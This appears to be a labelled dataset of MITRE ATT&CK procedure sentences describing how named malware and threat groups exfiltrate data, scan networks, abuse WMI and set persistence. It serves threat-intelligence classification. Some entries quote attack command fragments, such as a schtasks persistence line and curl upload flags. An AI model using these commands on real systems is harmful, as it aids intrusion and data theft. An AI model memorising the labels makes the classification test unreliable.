{"text1":"Emotet has been seen exfiltrating system information stored within cookies sent within an HTTP GET request back to its C2 servers.","labels":"['T1041']"}
|
|
{"text1":"Flagpro has exfiltrated data to the C2 server.","labels":"['T1041']"}
|
|
{"text1":"FlawedAmmyy has sent data collected from a compromised host to its C2 servers.","labels":"['T1041']"}
|
|
{"text1":"FoggyWeb can remotely exfiltrate sensitive information from a compromised AD FS server.","labels":"['T1041']"}
|
|
{"text1":"FunnyDream can execute commands, including gathering user information, and send the results to C2.","labels":"['T1041']"}
|
|
{"text1":"GALLIUM used Web shells and HTRAN for C2 and to exfiltrate data.","labels":"['T1041']"}
|
|
{"text1":"Grandoreiro can send data it retrieves to the C2 server.","labels":"['T1041']"}
|
|
{"text1":"GrimAgent has sent data related to a compromised host over its C2 channel.","labels":"['T1041']"}
|
|
{"text1":"HOPLIGHT has used its C2 channel to exfiltrate data.","labels":"['T1041']"}
|
|
{"text1":"Higaisa exfiltrated data over its C2 channel.","labels":"['T1041']"}
|
|
{"text1":"HotCroissant has the ability to download files from the infected host to the command and control (C2) server.","labels":"['T1041']"}
|
|
{"text1":"Imminent Monitor has uploaded a file containing debugger logs, network information and system information to the C2.","labels":"['T1041']"}
|
|
{"text1":"Industroyer sends information about hardware profiles and previously-received commands back to the C2 server in a POST-request.","labels":"['T1041']"}
|
|
{"text1":"KGH_SPY can exfiltrate collected information from the host to the C2 server.","labels":"['T1041']"}
|
|
{"text1":"KONNI has sent data and files to its C2 server.","labels":"['T1041']"}
|
|
{"text1":"Kessel has exfiltrated information gathered from the infected system to the C2 server.","labels":"['T1041']"}
|
|
{"text1":"Kimsuky has exfiltrated data over its C2 channel.","labels":"['T1041']"}
|
|
{"text1":"Leviathan has exfiltrated data over its C2 channel.","labels":"['T1041']"}
|
|
{"text1":"LightNeuron exfiltrates data over its email C2 channel.","labels":"['T1041']"}
|
|
{"text1":"LitePower can send collected data, including screenshots, over its C2 channel.","labels":"['T1041']"}
|
|
{"text1":"MacMa exfiltrates data from a supplied path over its C2 channel.","labels":"['T1041']"}
|
|
{"text1":"Machete's collected data is exfiltrated over the same channel used for C2.","labels":"['T1041']"}
|
|
{"text1":"MarkiRAT can exfiltrate locally stored data via its C2.","labels":"['T1041']"}
|
|
{"text1":"MechaFlounder has the ability to send the compromised user's account name and hostname within a URL to C2.","labels":"['T1041']"}
|
|
{"text1":"Metamorfo can send the data it collects to the C2 server.","labels":"['T1041']"}
|
|
{"text1":"Misdat has uploaded files and data to its C2 servers.","labels":"['T1041']"}
|
|
{"text1":"Mongall can upload files and information from a compromised host to its C2 server.","labels":"['T1041']"}
|
|
{"text1":"MuddyWater has used C2 infrastructure to receive exfiltrated data.","labels":"['T1041']"}
|
|
{"text1":"Octopus has uploaded stolen files and data from a victim's machine over its C2 channel.","labels":"['T1041']"}
|
|
{"text1":"OopsIE can upload files from the victim's machine to its C2 server.","labels":"['T1041']"}
|
|
{"text1":"Operation Wocao has used the Xserver backdoor to exfiltrate data.","labels":"['T1041']"}
|
|
{"text1":"OutSteel can upload files from a compromised host over its C2 channel.","labels":"['T1041']"}
|
|
{"text1":"PcShare can upload files and information from a compromised host to its C2 servers.","labels":"['T1041']"}
|
|
{"text1":"PoetRAT has exfiltrated data over the C2 channel.","labels":"['T1041']"}
|
|
{"text1":"Proxysvc performs data exfiltration over the control server channel using a custom protocol.","labels":"['T1041']"}
|
|
{"text1":"Psylo exfiltrates data to its C2 server over the same protocol as C2 communications.","labels":"['T1041']"}
|
|
{"text1":"Pteranodon exfiltrates screenshot files to its C2 server.","labels":"['T1041']"}
|
|
{"text1":"Pupy can send screenshots files, keylogger data, files, and recorded audio back to the C2 server.","labels":"['T1041']"}
|
|
{"text1":"QakBot can send stolen information to C2 nodes including passwords, accounts, and emails.","labels":"['T1041']"}
|
|
{"text1":"Remexi performs exfiltration over BITSAdmin, which is also used for the C2 channel.","labels":"['T1041']"}
|
|
{"text1":"S-Type has uploaded data and files from a compromised host to its C2 servers.","labels":"['T1041']"}
|
|
{"text1":"SDBbot has sent collected data from a compromised host to its C2 servers.","labels":"['T1041']"}
|
|
{"text1":"SILENTTRINITY can transfer files from an infected host to the C2 server.","labels":"['T1041']"}
|
|
{"text1":"SMOKEDHAM has exfiltrated data to its C2 server.","labels":"['T1041']"}
|
|
{"text1":"STARWHALE can exfiltrate collected data to its C2 servers.","labels":"['T1041']"}
|
|
{"text1":"Sandworm Team has sent system information to its C2 server using HTTP.","labels":"['T1041']"}
|
|
{"text1":"Shark has the ability to upload files from the compromised host over a DNS or HTTP C2 channel.","labels":"['T1041']"}
|
|
{"text1":"ShimRatReporter sent generated reports to the C2 via HTTP POST requests.","labels":"['T1041']"}
|
|
{"text1":"SideTwist has exfiltrated data over its C2 channel.","labels":"['T1041']"}
|
|
{"text1":"Sliver can exfiltrate files from the victim using the \"download\" command.","labels":"['T1041']"}
|
|
{"text1":"SombRAT has uploaded collected data and files from a compromised host to its C2 server.","labels":"['T1041']"}
|
|
{"text1":"StrifeWater can send data and files from a compromised host to its C2 server.","labels":"['T1041']"}
|
|
{"text1":"StrongPity can exfiltrate collected documents through C2 channels.","labels":"['T1041']"}
|
|
{"text1":"Stuxnet sends compromised victim information via HTTP.","labels":"['T1041']"}
|
|
{"text1":"TajMahal has the ability to send collected files over its C2.","labels":"['T1041']"}
|
|
{"text1":"Tomiris can upload files matching a hardcoded set of extensions, such as .doc, .docx, .pdf, and .rar, to its C2 server.","labels":"['T1041']"}
|
|
{"text1":"Torisma can send victim data to an actor-controlled C2 server.","labels":"['T1041']"}
|
|
{"text1":"TrickBot can send information about the compromised host and upload data to a hardcoded C2 server.","labels":"['T1041']"}
|
|
{"text1":"Ursnif has used HTTP POSTs to exfil gathered information.","labels":"['T1041']"}
|
|
{"text1":"Valak has the ability to exfiltrate data over the C2 channel.","labels":"['T1041']"}
|
|
{"text1":"XCSSET exfiltrates data stolen from a system over its C2 channel.","labels":"['T1041']"}
|
|
{"text1":"ZLib has sent data and files from a compromised host to its C2 servers.","labels":"['T1041']"}
|
|
{"text1":"njRAT has used HTTP to receive stolen information from the infected machine.","labels":"['T1041']"}
|
|
{"text1":"APT32 performed network scanning on the network to search for open ports, services, OS finger-printing, and other vulnerabilities.","labels":"['T1046']"}
|
|
{"text1":"APT34 has used the publicly available tool SoftPerfect Network Scanner as well as a custom tool called GOLDIRONY to conduct network scanning.","labels":"['T1046']"}
|
|
{"text1":"APT39 has used CrackMapExec and a custom port scanner known as BLUETORCH for network scanning.","labels":"['T1046']"}
|
|
{"text1":"Backdoor.Oldrea can use a network scanning module to identify ICS-related ports.","labels":"['T1046']"}
|
|
{"text1":"BlackEnergy has conducted port scans on a host.","labels":"['T1046']"}
|
|
{"text1":"BlackTech has used the SNScan tool to find other potential targets on victim networks.","labels":"['T1046']"}
|
|
{"text1":"China Chopper's server component can spider authentication portals.","labels":"['T1046']"}
|
|
{"text1":"Cobalt Group leveraged an open-source tool called SoftPerfect Network Scanner to perform network scanning.","labels":"['T1046']"}
|
|
{"text1":"Conficker scans for other machines to infect.","labels":"['T1046']"}
|
|
{"text1":"CostaRicto employed nmap and pscan to scan target environments.","labels":"['T1046']"}
|
|
{"text1":"During CostaRicto, the threat actors employed nmap and pscan to scan target environments.","labels":"['T1046']"}
|
|
{"text1":"During Operation Wocao, threat actors scanned for open ports and used nbtscan to find NETBIOS nameservers.","labels":"['T1046']"}
|
|
{"text1":"HDoor scans to identify open ports on the victim.","labels":"['T1046']"}
|
|
{"text1":"HermeticWizard has the ability to scan ports on a compromised network.","labels":"['T1046']"}
|
|
{"text1":"Industroyer uses a custom port scanner to map out a network.","labels":"['T1046']"}
|
|
{"text1":"InvisiMole can scan the network for open ports and vulnerable instances of RDP and SMB protocols.","labels":"['T1046']"}
|
|
{"text1":"Koadic can scan for open TCP ports on the target network.","labels":"['T1046']"}
|
|
{"text1":"Lucifer can scan for open ports including TCP ports 135 and 1433.","labels":"['T1046']"}
|
|
{"text1":"NBTscan can be used to scan IP networks.","labels":"['T1046']"}
|
|
{"text1":"OilRig has used the publicly available tool SoftPerfect Network Scanner as well as a custom tool called GOLDIRONY to conduct network scanning.","labels":"['T1046']"}
|
|
{"text1":"Operation Wocao has scanned for open ports and used nbtscan to find NETBIOS nameservers.","labels":"['T1046']"}
|
|
{"text1":"Peirates can initiate a port scan against a given IP address.","labels":"['T1046']"}
|
|
{"text1":"PoshC2 can perform port scans from an infected host.","labels":"['T1046']"}
|
|
{"text1":"Pupy has a built-in module for port scanning.","labels":"['T1046']"}
|
|
{"text1":"Pysa can perform network reconnaissance using the Advanced Port Scanner tool.","labels":"['T1046']"}
|
|
{"text1":"Rocke conducted scanning for exposed TCP port 7001 as well as SSH and Redis servers.","labels":"['T1046']"}
|
|
{"text1":"SILENTTRINITY can scan for open ports on a compromised machine.","labels":"['T1046']"}
|
|
{"text1":"SpeakUp checks for availability of specific ports on servers.","labels":"['T1046']"}
|
|
{"text1":"Suckfly scanned the victim's internal network for hosts with ports 8080, 5900, and 40 open.","labels":"['T1046']"}
|
|
{"text1":"TeamTNT has used masscan to search for open Docker API ports and Kubernetes clusters. TeamTNT has also used malware that utilizes zmap and zgrab to search for vulnerable services in cloud environments.","labels":"['T1046']"}
|
|
{"text1":"ZxShell can launch port scans.","labels":"['T1046']"}
|
|
{"text1":"menuPass has used tcping.exe, similar to Ping, to probe port status on systems of interest.","labels":"['T1046']"}
|
|
{"text1":"A BlackEnergy 2 plug-in uses WMI to gather victim host details.","labels":"['T1047']"}
|
|
{"text1":"A Threat Group-3390 tool can use WMI to execute a binary.","labels":"['T1047']"}
|
|
{"text1":"APT29 used WMI to steal credentials and execute backdoors at a future time. They have also used WMI for the remote execution of files for lateral movement.","labels":"['T1047']"}
|
|
{"text1":"APT32 used WMI to deploy their tools on remote machines and to gather information about the Outlook process.","labels":"['T1047']"}
|
|
{"text1":"APT41 used WMI in several ways, including for execution of commands via WMIEXEC as well as for persistence via PowerSploit.","labels":"['T1047']"}
|
|
{"text1":"Agent Tesla has used wmi queries to gather information from the system.","labels":"['T1047']"}
|
|
{"text1":"Astaroth uses WMIC to execute payloads.","labels":"['T1047']"}
|
|
{"text1":"Blue Mockingbird has used wmic.exe to set environment variables.","labels":"['T1047']"}
|
|
{"text1":"Bumblebee can use WMI to gather system information and to spawn processes for code injection.","labels":"['T1047']"}
|
|
{"text1":"CharmPower can use `wmic` to gather information from a system.","labels":"['T1047']"}
|
|
{"text1":"Chimera has used WMIC to execute remote commands.","labels":"['T1047']"}
|
|
{"text1":"CrackMapExec can execute remote commands using Windows Management Instrumentation.","labels":"['T1047']"}
|
|
{"text1":"DarkWatchman can use WMI to execute commands.","labels":"['T1047']"}
|
|
{"text1":"During C0015, the threat actors used `wmic` and `rundll32` to load Cobalt Strike onto a target host.","labels":"['T1047']"}
|
|
{"text1":"During Frankenstein, the threat actors used WMI queries to check if various security applications were running as well as to determine the operating system version.","labels":"['T1047']"}
|
|
{"text1":"EKANS can use Windows Management Instrumentation (WMI) calls to execute operations.","labels":"['T1047']"}
|
|
{"text1":"EVILNUM has used the Windows Management Instrumentation (WMI) tool to enumerate infected machines.","labels":"['T1047']"}
|
|
{"text1":"Earth Lusca used a VBA script to execute WMI.","labels":"['T1047']"}
|
|
{"text1":"Emotet has used WMI to execute powershell.exe.","labels":"['T1047']"}
|
|
{"text1":"Empire can use WMI to deliver a payload to a remote host.","labels":"['T1047']"}
|
|
{"text1":"EvilBunny has used WMI to gather information about the system.","labels":"['T1047']"}
|
|
{"text1":"FELIXROOT uses WMI to query the Windows Registry.","labels":"['T1047']"}
|
|
{"text1":"FIN6 has used WMI to automate the remote execution of PowerShell scripts.","labels":"['T1047']"}
|
|
{"text1":"FIN7 has used WMI to install malware on targeted systems.","labels":"['T1047']"}
|
|
{"text1":"FIN8's malicious spearphishing payloads use WMI to launch malware and spawn cmd.exe execution. FIN8 has also used WMIC for lateral movement as well as during and post compromise cleanup activities.","labels":"['T1047']"}
|
|
{"text1":"FlawedAmmyy leverages WMI to enumerate anti-virus on the victim.","labels":"['T1047']"}
|
|
{"text1":"Frankenstein has used WMI queries to check if various security applications were running, as well as the operating system version.","labels":"['T1047']"}
|
|
{"text1":"FunnyDream can use WMI to open a Windows command shell on a remote machine.","labels":"['T1047']"}
|
|
{"text1":"GALLIUM used WMI for execution to assist in lateral movement as well as for installing tools across multiple assets.","labels":"['T1047']"}
|
|
{"text1":"Gamaredon Group has used WMI to execute scripts used for discovery.","labels":"['T1047']"}
|
|
{"text1":"GravityRAT collects various information via WMI requests, including CPU information in the Win32_Processor entry (Processor ID, Name, Manufacturer and the clock speed).","labels":"['T1047']"}
|
|
{"text1":"HALFBAKED can use WMI queries to gather system information.","labels":"['T1047']"}
|
|
{"text1":"HELLOKITTY can use WMI to delete volume shadow copies.","labels":"['T1047']"}
|
|
{"text1":"HOPLIGHT has used WMI to recompile the Managed Object Format (MOF) files in the WMI repository.","labels":"['T1047']"}
|
|
{"text1":"HermeticWizard can use WMI to create a new process on a remote machine via `C:\\windows\\system32\\cmd.exe \/c start C:\\windows\\system32\\\\regsvr32.exe \/s \/iC:\\windows\\<filename>.dll`.","labels":"['T1047']"}
|
|
{"text1":"IcedID has used WMI to execute binaries.","labels":"['T1047']"}
|
|
{"text1":"Impacket's wmiexec module can be used to execute commands through WMI.","labels":"['T1047']"}
|
|
{"text1":"Koadic can use WMI to execute commands.","labels":"['T1047']"}
|
|
{"text1":"Lazarus Group has used WMIC for discovery as well as to execute payloads for persistence and lateral movement.","labels":"['T1047']"}
|
|
{"text1":"Lucifer can use WMI to log into remote machines for propagation.","labels":"['T1047']"}
|
|
{"text1":"Magic Hound has used a tool to run `cmd \/c wmic computersystem get domain` for discovery.","labels":"['T1047']"}
|
|
{"text1":"Maze has used WMI to attempt to delete the shadow volumes on a machine, and to connect a virtual machine to the network domain of the victim organization's network.","labels":"['T1047']"}
|
|
{"text1":"Meteor can use `wmic.exe` as part of its effort to delete shadow copies.","labels":"['T1047']"}
|
|
{"text1":"Micropsia searches for anti-virus software and firewall products installed on the victim\u2019s machine using WMI.","labels":"['T1047', 'T1518.001']"}
|
|
{"text1":"Mosquito's installer uses WMI to search for antivirus display names.","labels":"['T1047']"}
|
|
{"text1":"MuddyWater has used malware that leveraged WMI for execution and querying host information.","labels":"['T1047']"}
|
|
{"text1":"Naikon has used WMIC.exe for lateral movement.","labels":"['T1047']"}
|
|
{"text1":"Netwalker can use WMI to delete Shadow Volumes.","labels":"['T1047']"}
|
|
{"text1":"NotPetya can use \"wmic\" to help propagate itself across a network.","labels":"['T1047']"}
|
|
{"text1":"Octopus has used wmic.exe for local discovery information.","labels":"['T1047']"}
|
|
{"text1":"OilRig has used WMI for execution.","labels":"['T1047']"}
|
|
{"text1":"OopsIE uses WMI to perform discovery techniques.","labels":"['T1047']"}
|
|
{"text1":"POWERSTATS can use WMI queries to retrieve data from compromised hosts.","labels":"['T1047']"}
|
|
{"text1":"POWRUNER may use WMI when collecting information about a victim.","labels":"['T1047']"}
|
|
{"text1":"ProLock can use WMIC to execute scripts on targeted hosts.","labels":"['T1047']"}
|
|
{"text1":"PyDCrypt has attempted to execute with WMIC.","labels":"['T1047']"}
|
|
{"text1":"RATANKBA uses WMI to perform process monitoring.","labels":"['T1047']"}
|
|
{"text1":"REvil can use WMI to monitor for and kill specific processes listed in its configuration file.","labels":"['T1047']"}
|
|
{"text1":"Remexi executes received commands with wmic.exe (for WMI commands).","labels":"['T1047']"}
|
|
{"text1":"RogueRobin uses various WMI queries to check if the sample is running in a sandbox.","labels":"['T1047']"}
|
|
{"text1":"SILENTTRINITY can use WMI for lateral movement.","labels":"['T1047']"}
|
|
{"text1":"SUNBURST used the WMI query \"Select * From Win32_SystemDriver\" to retrieve a driver listing.","labels":"['T1047']"}
|
|
{"text1":"Sandworm Team has used VBScript to run WMI queries.","labels":"['T1047']"}
|
|
{"text1":"SharpStage can use WMI for execution.","labels":"['T1047']"}
|
|
{"text1":"Stuxnet used WMI with an \"explorer.exe\" token to execute on a remote share.","labels":"['T1047']"}
|
|
{"text1":"SysUpdate can use WMI for execution on a compromised host.","labels":"['T1047']"}
|
|
{"text1":"UNC2452 used WMI for the remote execution of files for lateral movement.","labels":"['T1047']"}
|
|
{"text1":"Ursnif droppers have used WMI classes to execute PowerShell commands.","labels":"['T1047']"}
|
|
{"text1":"Valak can use \"wmic process call create\" in a scheduled task to launch plugins and for execution.","labels":"['T1047']"}
|
|
{"text1":"WannaCry utilizes \"wmic\" to delete shadow copies.","labels":"['T1047']"}
|
|
{"text1":"Windshift has used WMI to collect information about target machines.","labels":"['T1047']"}
|
|
{"text1":"Wizard Spider has used WMI and LDAP queries for network discovery and to move laterally.","labels":"['T1047']"}
|
|
{"text1":"jRAT uses WMIC to identify anti-virus products installed on the victim\u2019s machine and to obtain firewall details.","labels":"['T1047']"}
|
|
{"text1":"Bundlore uses the \"curl -s -L -o\" command to exfiltrate archived data to a URL.","labels":"['T1048']"}
|
|
{"text1":"FrameworkPOS can use DNS tunneling for exfiltration of credit card data.","labels":"['T1048']"}
|
|
{"text1":"Hydraq connects to a predefined domain on port 443 to exfil gathered information.","labels":"['T1048']"}
|
|
{"text1":"Kobalos can exfiltrate credentials over the network via UDP.","labels":"['T1048']"}
|
|
{"text1":"PoetRAT has used a .NET tool named dog.exe to exfiltrate information over an e-mail account.","labels":"['T1048']"}
|
|
{"text1":"APT28 has exfiltrated archives of collected data previously staged on a target's OWA server via HTTPS.","labels":"['T1048.002']"}
|
|
{"text1":"APT29 has exfiltrated collected data over a simple HTTPS request to a password-protected archive staged on a victim's OWA servers.","labels":"['T1048.002']"}
|
|
{"text1":"UNC2452 exfiltrated collected data over a simple HTTPS request to a password-protected archive staged on a victim's OWA servers.","labels":"['T1048.002']"}
|
|
{"text1":"APT32's backdoor can exfiltrate data by encoding it in the subdomain field of DNS packets.","labels":"['T1048.003']"}
|
|
{"text1":"Agent Tesla has routines for exfiltration over SMTP, FTP, and HTTP.","labels":"['T1048.003']"}
|
|
{"text1":"BITSAdmin can be used to create BITS Jobs to upload files from a compromised host.","labels":"['T1048.003']"}
|
|
{"text1":"CORALDECK has exfiltrated data in HTTP POST headers.","labels":"['T1048.003']"}
|
|
{"text1":"Carbon uses HTTP to send data to the C2 server.","labels":"['T1048.003']"}
|
|
{"text1":"CharmPower can send victim data via FTP with credentials hardcoded in the script.","labels":"['T1048.003']"}
|
|
{"text1":"Cherry Picker exfiltrates files over FTP.","labels":"['T1048.003']"}
|
|
{"text1":"CookieMiner has used the \"curl --upload-file\" command to exfiltrate data over HTTP.","labels":"['T1048.003']"}
|
|
{"text1":"CosmicDuke exfiltrates collected files over FTP or WebDAV. Exfiltration servers can be separately configured from C2 servers.","labels":"['T1048.003']"}
|
|
{"text1":"Dok exfiltrates logs of its execution stored in the \"\/tmp\" folder over FTP using the \"curl\" command.","labels":"['T1048.003']"}
|
|
{"text1":"FIN8 has used FTP to exfiltrate collected data.","labels":"['T1048.003']"}
|
|
{"text1":"Kessel can exfiltrate credentials and other information via HTTP POST request, TCP, and DNS.","labels":"['T1048.003']"}
|
|
{"text1":"Lazarus Group malware SierraBravo-Two generates an email message via SMTP containing information about newly infected victims.","labels":"['T1048.003']"}
|
|
{"text1":"PoetRAT has used ftp for exfiltration.","labels":"['T1048.003']"}
|
|
{"text1":"Remsec can exfiltrate data via a DNS tunnel or email, separately from its C2 channel.","labels":"['T1048.003']"}
|
|
{"text1":"Some Brave Prince variants have used South Korea's Daum email service to exfiltrate information, and later variants have posted the data to a web server via an HTTP post command.","labels":"['T1048.003']"}
|
|
{"text1":"Thrip has used WinSCP to exfiltrate data from a targeted organization over FTP.","labels":"['T1048.003']"}
|
|
{"text1":"WindTail has the ability to automatically exfiltrate files using the macOS built-in utility \/usr\/bin\/curl.","labels":"['T1048.003']"}
|
|
{"text1":"Wizard Spider has exfiltrated victim information using FTP.","labels":"['T1048.003']"}
|
|
{"text1":"ccf32 can upload collected data and files to an FTP server.","labels":"['T1048.003']"}
|
|
{"text1":"ftp may be used to exfiltrate data separate from the main command and control protocol.","labels":"['T1048.003']"}
|
|
{"text1":"APT32 used the \"netstat -anpo tcp\" command to display TCP connections on the victim's machine.","labels":"['T1049']"}
|
|
{"text1":"APT38 installed a port monitoring tool, MAPMAKER, to print the active TCP connections on the local system.","labels":"['T1049']"}
|
|
{"text1":"Andariel has used the \"netstat -naop tcp\" command to display TCP connections on a victim's machine.","labels":"['T1049']"}
|
|
{"text1":"Aria-body has the ability to gather TCP and UDP table status listings.","labels":"['T1049']"}
|
|
{"text1":"Babuk can use \u201cWNetOpenEnumW\u201d and \u201cWNetEnumResourceW\u201d to enumerate files in network resources for encryption.","labels":"['T1049']"}
|
|
{"text1":"BackdoorDiplomacy has used NetCat and PortQry to enumerate network connections and display the status of related TCP and UDP ports.","labels":"['T1049']"}
|
|
{"text1":"BlackEnergy has gathered information about local network connections using netstat.","labels":"['T1049']"}
|
|
{"text1":"Carbon uses the \"netstat -r\" and \"netstat -an\" commands.","labels":"['T1049']"}
|
|
{"text1":"Chimera has used \"netstat -ano | findstr EST\" to discover network connections.","labels":"['T1049']"}
|
|
{"text1":"Cobalt Strike can produce a sessions report from compromised hosts.","labels":"['T1049']"}
|
|
{"text1":"Commands such as \"net use\" and \"net session\" can be used in Net to gather information about network connections from a particular host.","labels":"['T1049']"}
|
|
{"text1":"Comnie executes the \"netstat -ano\" command.","labels":"['T1049']"}
|
|
{"text1":"Conti can enumerate routine network connections from a compromised host.","labels":"['T1049']"}
|
|
{"text1":"Cuba can use the function \"GetIpNetTable\" to recover the last connections to the victim's machine.","labels":"['T1049']"}
|
|
{"text1":"Dtrack can collect network and active connection information.","labels":"['T1049']"}
|
|
{"text1":"During FunnyDream, the threat actors used netstat to discover network connections on remote systems.","labels":"['T1049']"}
|
|
{"text1":"During Operation Wocao, threat actors collected a list of open connections on the infected system using `netstat` and checked whether it had an internet connection.","labels":"['T1049']"}
|
|
{"text1":"Egregor can enumerate all connected drives.","labels":"['T1049']"}
|
|
{"text1":"Empire can enumerate the current network connections of a host.","labels":"['T1049']"}
|
|
{"text1":"Epic uses the \"net use\", \"net session\", and \"netstat\" commands to gather information on network connections.","labels":"['T1049']"}
|
|
{"text1":"GravityRAT uses the \"netstat\" command to find open ports on the victim\u2019s machine.","labels":"['T1049']"}
|
|
{"text1":"KONNI has used \"net session\" on the victim's machine.","labels":"['T1049']"}
|
|
{"text1":"Ke3chang performs local network connection discovery using \"netstat\".","labels":"['T1049']"}
|
|
{"text1":"Kwampirs collects a list of active and listening connections by using the command \"netstat -nao\" as well as a list of available network mappings with \"net use\".","labels":"['T1049']"}
|
|
{"text1":"Lazarus Group has used \"net use\" to identify and establish a network connection with a remote host.","labels":"['T1049']"}
|
|
{"text1":"Lucifer can identify the IP and port numbers for all remote connections from the compromised host.","labels":"['T1049']"}
|
|
{"text1":"Machete uses the \"netsh wlan show networks mode=bssid\" and \"netsh wlan show interfaces\" commands to list all nearby WiFi networks and connected interfaces.","labels":"['T1049']"}
|
|
{"text1":"Magic Hound has used quser.exe to identify existing RDP connections.","labels":"['T1049']"}
|
|
{"text1":"Maze has used the \"WNetOpenEnumW\", \"WNetEnumResourceW\", \"WNetCloseEnum\" and \"WNetAddConnection2W\" functions to enumerate the network resources on the infected machine.","labels":"['T1049']"}
|
|
{"text1":"NETWIRE can capture session logon details from a compromised host.","labels":"['T1049']"}
|
|
{"text1":"OilRig has used \"netstat -an\" on a victim to get a listing of network connections.","labels":"['T1049']"}
|
|
{"text1":"Okrum was seen using NetSess to discover NetBIOS sessions.","labels":"['T1049']"}
|
|
{"text1":"PlugX has a module for enumerating TCP and UDP network connections and associated processes using the \"netstat\" command.","labels":"['T1049']"}
|
|
{"text1":"Poseidon Group obtains and saves information about victim network interfaces and addresses.","labels":"['T1049']"}
|
|
{"text1":"PoshC2 contains an implementation of netstat to enumerate TCP and UDP connections.","labels":"['T1049']"}
|
|
{"text1":"Pupy has a built-in utility command for \"netstat\", can do net session through PowerView, and has an interactive shell which can be used to discover additional information.","labels":"['T1049']"}
|
|
{"text1":"PyDCrypt has used netsh to find RPC connections on remote machines.","labels":"['T1049']"}
|
|
{"text1":"QakBot can use \"netstat\" to enumerate current network connections.","labels":"['T1049']"}
|
|
{"text1":"RATANKBA uses \"netstat -ano\" to search for specific IP address ranges.","labels":"['T1049']"}
|
|
{"text1":"Ramsay can use \"netstat\" to enumerate network connections.","labels":"['T1049']"}
|
|
{"text1":"RedLeaves can enumerate drives and Remote Desktop sessions.","labels":"['T1049']"}
|
|
{"text1":"SHOTPUT uses netstat to list TCP connection status.","labels":"['T1049']"}
|
|
{"text1":"SLOTHFULMEDIA can enumerate open ports on a victim machine.","labels":"['T1049']"}
|
|
{"text1":"Sandworm Team had gathered user, IP address, and server data related to RDP sessions on a compromised host. It has also accessed network diagram files useful for understanding how a host's network was configured.","labels":"['T1049']"}
|
|
{"text1":"ShimRatReporter used the Windows function \"GetExtendedUdpTable\" to detect connected UDP endpoints.","labels":"['T1049']"}
|
|
{"text1":"Sibot has retrieved a GUID associated with a present LAN connection on a compromised machine.","labels":"['T1049']"}
|
|
{"text1":"Sliver can collect network connection information.","labels":"['T1049']"}
|
|
{"text1":"Sykipot may use \"netstat -ano\" to display active network connections.","labels":"['T1049']"}
|
|
{"text1":"TeamTNT has run \"netstat -anp\" to search for rival malware connections. TeamTNT has also used `libprocesshider` to modify \"\/etc\/ld.so.preload\".","labels":"['T1049']"}
|
|
{"text1":"The discovery modules used with Duqu can collect information on network connections.","labels":"['T1049']"}
|
|
{"text1":"Threat Group-3390 has used `net use` and `netstat` to conduct internal discovery of systems. The group has also used `quser.exe` to identify existing RDP sessions on a victim.","labels":"['T1049']"}
|
|
{"text1":"Tropic Trooper has used command scripts to test whether the localhost network is available and to check other connection capabilities on an infected system.","labels":"['T1049']"}
|
|
{"text1":"USBferry can use \"netstat\" and \"nbtstat\" to detect active network connections.","labels":"['T1049']"}
|
|
{"text1":"Volgmer can gather information about TCP connection state.","labels":"['T1049']"}
|
|
{"text1":"Waterbear can use API hooks on `GetExtendedTcpTable` to retrieve a table containing a list of TCP endpoints available to the application.","labels":"['T1049']"}
|
|
{"text1":"Zebrocy uses \"netstat -aon\" to gather network connection information.","labels":"['T1049']"}
|
|
{"text1":"admin@338 actors used the following command following exploitation of a machine with LOWBALL malware to display network connections: \"netstat -ano >> %temp%\\download\"","labels":"['T1049']"}
|
|
{"text1":"menuPass has used \"net use\" to conduct connectivity checks to machines.","labels":"['T1049']"}
|
|
{"text1":"netstat can be used to enumerate local network connections, including active TCP connections and other network statistics.","labels":"['T1049']"}
|
|
{"text1":"Agent.btz creates a file named thumb.dd on all USB flash drives connected to the victim. This file contains information about the infected system and activity logs.","labels":"['T1052.001']"}
|
|
{"text1":"Mustang Panda has used a customized PlugX variant which could exfiltrate documents from air-gapped networks.","labels":"['T1052.001']"}
|
|
{"text1":"Remsec contains a module to move data from airgapped networks to Internet-connected systems by using a removable USB device.","labels":"['T1052.001']"}
|
|
{"text1":"SPACESHIP copies staged data to removable drives when they are inserted into the system.","labels":"['T1052.001']"}
|
|
{"text1":"USBStealer exfiltrates collected files via removable media from air-gapped victims.","labels":"['T1052.001']"}
|
|
{"text1":"Dragonfly has used a scheduled task to execute a malicious file.","labels":"['T1053']"}
|
|
{"text1":"Earth Lusca used the command \"schtasks \/Create \/SC ONLOgon \/TN WindowsUpdateCheck \/TR \u201c[file path]\u201d \/ru system\" for persistence.","labels":"['T1053']"}
|
|
{"text1":"BRONZE BUTLER has used at to register a scheduled task to execute malware during lateral movement.","labels":"['T1053.002']"}
|
|
{"text1":"CrackMapExec can set a scheduled task on the target system to execute commands remotely using at.","labels":"['T1053.002']"}
|
|
{"text1":"at can be used to schedule a task on a system to be executed at a specific date or time.","labels":"['T1053.002']"}
|
|
{"text1":"Anchor can install itself as a cron job.","labels":"['T1053.003']"}
|
|
{"text1":"Exaramel for Linux uses crontab for persistence if it does not have root privileges.","labels":"['T1053.003']"}
|
|
{"text1":"Janicab used a cron job for persistence on Mac devices.","labels":"['T1053.003']"}
|
|
{"text1":"Kinsing has used crontab to download and run shell scripts every minute to ensure persistence.","labels":"['T1053.003']"}
|
|
{"text1":"Penquin can use Cron to create periodic and pre-scheduled background jobs.","labels":"['T1053.003']"}
|
|
{"text1":"Rocke installed a cron job that downloaded and executed files from the C2.","labels":"['T1053.003']"}
|
|
{"text1":"Skidmap has installed itself via crontab.","labels":"['T1053.003']"}
|
|
{"text1":"SpeakUp uses cron tasks to ensure persistence.","labels":"['T1053.003']"}
|
|
{"text1":"The GoldMax Linux variant has used a crontab entry with a \"@reboot\" line to gain persistence.","labels":"['T1053.003']"}
|
|
{"text1":"A Patchwork file stealer can run a TaskScheduler DLL to add persistence.","labels":"['T1053.005']"}
|
|
{"text1":"APT-C-36 has used a macro function to set scheduled tasks, disguised as those used by Google.","labels":"['T1053.005']"}
|
|
{"text1":"APT32 has used scheduled tasks to persist on victim systems.","labels":"['T1053.005']"}
|
|
{"text1":"APT33 has created a scheduled task to execute a .vbe file multiple times a day.","labels":"['T1053.005']"}
|
|
{"text1":"APT37 has created scheduled tasks to run malicious scripts on a compromised host.","labels":"['T1053.005']"}
|
|
{"text1":"APT39 has created scheduled tasks for persistence.","labels":"['T1053.005']"}
|
|
{"text1":"APT41 used a compromised account to create a scheduled task on a system.","labels":"['T1053.005']"}
|
|
{"text1":"Anchor can create a scheduled task for persistence.","labels":"['T1053.005']"}
|
|
{"text1":"AppleJeus has created a scheduled SYSTEM task that runs when a user logs in.","labels":"['T1053.005']"}
|
|
